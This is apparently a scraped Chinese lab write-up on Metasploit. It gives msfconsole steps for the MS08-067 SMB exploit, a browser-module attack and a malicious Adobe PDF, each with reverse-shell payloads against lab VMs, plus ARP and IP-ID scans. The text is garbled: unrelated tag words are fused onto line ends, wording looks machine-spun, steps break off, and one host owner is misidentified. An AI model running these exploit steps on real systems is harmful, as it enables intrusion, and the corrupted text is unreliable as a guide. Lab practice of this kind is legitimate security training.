本实践目标是掌握metasploit的基本应用方式,重点经常使用的三种攻击方式的思路。具体须要完成:html
1.一个主动攻击实践,如ms08_067; (1分)shell
一个针对浏览器的攻击,如ms11_050;(1分)windows
一个针对客户端的攻击,如Adobe;(1分)api
成功应用任何一个辅助模块。(0.5分)浏览器
靶机: windows XP SP3(English)网络
攻击机:kaliapp
msfconsole
进入控制台,输入search ms08_067
指令查询一下针对该漏洞能够运用的攻击模块:use exploit/windows/smb/ms08_067_netapi
使用该模块:show payloads
查看能够供咱们使用的payload
并找到一个可用的攻击载荷:用set payload generic/shell_reverse_tcp
即tcp反向回连设置payload
。tcp
使用指令show options
查看咱们须要设置的参数,须要设置一个RHOST(靶机的IP地址)和一个LHOST(攻击机的IP地址)。而且看到target是0,即自动选择目标系统类型,就不用再设置了。工具
set LHOST 192.168.206.129
和set LPORT 5205
设置本机地址和端口,使用set RHOST 192.168.206.135
设置耙机地址,使用show options
查看设置结果:exploit
指令开始攻击,出现了一个错误:攻击机:kali
靶机:windowsXP Professional sp2
IE:8.0测试
search ms10_046
指令查看能够运用的攻击模块,进入模块后将SRVHOST和LHOST填攻击机的IP地址,在ip浏览器中输入生成的URL后会出错:攻击机:kali
靶机:windowsXP Professional sp2
Adobe版本:9.3
search adobe
查询针对adobe攻击的模块,使用use exploit/windows/fileformat/adobe_toolbutton
,使用set payload windows/meterpreter/reverse_tcp
设置payloadshow options
看一下须要设置的参数exploit
开始攻击,能够看到生成了pdf文件。强行关闭了pdf文件后,能够看到监听的会话被关闭了。
先使用show auxiliary
查看w全部的辅助模块以及他们的用途,在metasploit中,辅助模块的用途很是普遍,他们能够是扫描器/拒绝服务攻击工具/fuzz测试器,以及其余类型的工具。
show scanner
找一个比较简单一点的,最后选择了arp_sweep
。能够参考(MSF内网渗透 扫描模块)arp_sweep
使用ARP请求枚举本地局域网络中的全部活跃主机进行扫描。进入模块后查询一下参数
msf > use auxiliary/scanner/discovery/arp_sweep ---进入arp_sweep 模块 msf auxiliary(arp_sweep) > show options ---查询模块参数
以后进行参数设置
msf auxiliary(arp_sweep) > set RHOSTS 10.10.10.0/24--用set进行hosts主机段设置 RHOSTS => 10.10.10.0/24 msf auxiliary(arp_sweep) > set THREADS 50 --加快扫描速度 THREADS => 50 msf auxiliary(arp_sweep) > run --执行run进行扫描
10.43.32.1 appears to be up (USC INFORMATION SCIENCES INST).
是啥呢??查了一下后面英文的意思是加利福尼亚大学洛杉矶分校。。。search ipidseq
后选择相应模块,查看须要设置的参数:设置参数后exploit,扫描成功